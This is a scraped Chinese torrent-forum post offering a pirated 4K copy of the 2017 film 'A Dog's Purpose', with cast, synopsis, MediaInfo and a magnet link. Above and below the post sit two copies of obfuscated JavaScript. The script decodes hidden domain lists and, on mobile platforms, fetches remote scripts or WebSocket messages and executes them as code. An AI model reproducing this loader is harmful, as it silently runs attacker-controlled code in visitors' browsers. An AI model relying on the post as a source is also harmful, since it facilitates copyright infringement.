一条狗的使命[中文字幕].A.Dog's.Purpose.2017.2160p.WEB-DL.H265.DD2.0-bt9527.cc 20.62GB

版主小s 13天前 133

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译  名 一条狗的使命 / 为了与你相遇(台) / 再见亦是狗朋友(港)
◎片  名 A Dog's Purpose
◎年  代 2017
◎产  地 美国
◎类  别 剧情 / 喜剧 / 家庭
◎语  言 英语
◎上映日期 2017-03-03(中国大陆) / 2017-01-27(美国)
◎IMDb链接 https://www.imdb.com/title/tt1753383/
◎豆瓣评分 7.7/10 (341634人评价)
◎豆瓣链接 https://movie.douban.com/subject/6873143/
◎片  长 101分钟
◎导  演 拉斯·霍尔斯道姆 Lasse Hallstr?m (id:1018014)
◎编  剧 W·布鲁斯·卡梅伦 W. Bruce Cameron (id:1367785)
       凯瑟琳·迈克 Cathryn Michon (id:1367786)
       奥黛丽·威尔斯 Audrey Wells (id:1045444)
       玛雅·福布斯 Maya Forbes (id:1283968)
       沃利·亚历斯戴尔 Wally Wolodarsky (id:1367787)
◎演  员 乔什·加德 Josh Gad (id:1305235)
       布丽特·罗伯森 Britt Robertson (id:1000088)
       丹尼斯·奎德 Dennis Quaid (id:1002679)
       佩吉·利普顿 Peggy Lipton (id:1049592)
       K·J·阿帕 K.J. Apa (id:1368098)
       布莱斯·吉扎尔 Bryce Gheisar (id:1368154)
       朱丽叶·赖伦斯 Juliet Rylance (id:1214379)
       卢克·柯比 Luke Kirby (id:1114638)
       加布里埃尔·罗斯 Gabrielle Rose (id:1296049)
       迈克尔·博夫舍维尔 Michael Bofshever (id:1066904)
       洛根·米勒 Logan Miller (id:1004893)
       柯尔比·豪威尔-巴普蒂斯特 Kirby Howell-Baptiste (id:1368155)
       普奇·豪尔 Pooch Hall (id:1092764)
       约翰·奥提兹 John Ortiz (id:1018110)
       妮科尔·勒普拉卡 Nicole LaPlaca (id:1109402)
       彼特·科拉米斯 Peter Kelamis (id:1288324)
       卡罗琳·凯芙 Caroline Cave (id:1280322)
       简·迈克格雷格 Jane McGregor (id:1345153)
       科维西·阿梅扬 Kwesi Ameyaw (id:1056659)
       卡琳·博姆拜克 Kalyn Bomback (id:1063161)
       娜奥米·弗伦内特 Naomi Frenette (id:1358955)
       蕾切尔·波特曼 Rachel Portman (id:1037009)

◎标  签 温情 / 狗 / 治愈系 / 动物 / 感人 / 感动 / 美国 / 爱

◎简  介
  影片以汪星人的视角展现狗狗和人类的微妙情感,一只狗狗陪伴小主人长大成人,甚至为他追到了女朋友,后来它年迈死去又转世投胎变成其他性别和类型的汪,第二次轮回狗狗变成了警犬威风凛凛,再次转轮回,又成了陪伴一位单身女青年的小柯基犬。在经历了多次轮回之后,最终回到最初的主人身边。

◎获奖情况 (共2项)
  第4届豆瓣电影年度榜单 (2017)
  评分最高的喜剧片(提名)
  3月最受关注电影(提名)

  1. ##### MediaInfo ######
  2. General
  3. Complete name                            : 一条狗的使命.A.Dog'[email protected]
  4. Format                                   : MPEG-4
  5. Format profile                           : Base Media
  6. Codec ID                                 : isom (isom/iso2/mp41)
  7. File size                                : 20.6 GiB
  8. Duration                                 : 1 h 39 min
  9. Overall bit rate                         : 29.6 Mb/s
  10. Writing application                      : OurTV Multimedia Platform
  11. Video
  12. ID                                       : 1
  13. Format                                   : HEVC
  14. Format/Info                              : High Efficiency Video Coding
  15. Format profile                           : [email protected]@High
  16. Codec ID                                 : hev1
  17. Codec ID/Info                            : High Efficiency Video Coding
  18. Duration                                 : 1 h 39 min
  19. Bit rate                                 : 29.2 Mb/s
  20. Width                                    : 3 840 pixels
  21. Height                                   : 2 160 pixels
  22. Display aspect ratio                     : 16:9
  23. Frame rate mode                          : Constant
  24. Frame rate                               : 25.000 FPS
  25. Color space                              : YUV
  26. Chroma subsampling                       : 4:2:0
  27. Bit depth                                : 8 bits
  28. Bits/(Pixel*Frame)                       : 0.141
  29. Stream size                              : 20.4 GiB (99%)
  30. Writing library                          : PONTUS-series
  31. Color range                              : Limited
  32. Codec configuration box                  : hvcC
  33. Audio
  34. ID                                       : 2
  35. Format                                   : AC-3
  36. Format/Info                              : Audio Coding 3
  37. Commercial name                          : Dolby Digital
  38. Codec ID                                 : ac-3
  39. Duration                                 : 1 h 39 min
  40. Bit rate mode                            : Constant
  41. Bit rate                                 : 384 kb/s
  42. Channel(s)                               : 2 channels
  43. Channel layout                           : L R
  44. Sampling rate                            : 48.0 kHz
  45. Frame rate                               : 31.250 FPS (1536 SPF)
  46. Compression mode                         : Lossy
  47. Stream size                              : 274 MiB (1%)
  48. Service kind                             : Complete Main
  49. Default                                  : Yes
  50. Alternate group                          : 1
复制代码




TAGS 剧情 喜剧 家庭

磁力链:
  • magnet:?xt=urn:btih:5D9DE6F5C4CDC4EDBC4B9444C77851DB0EC0DF07

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};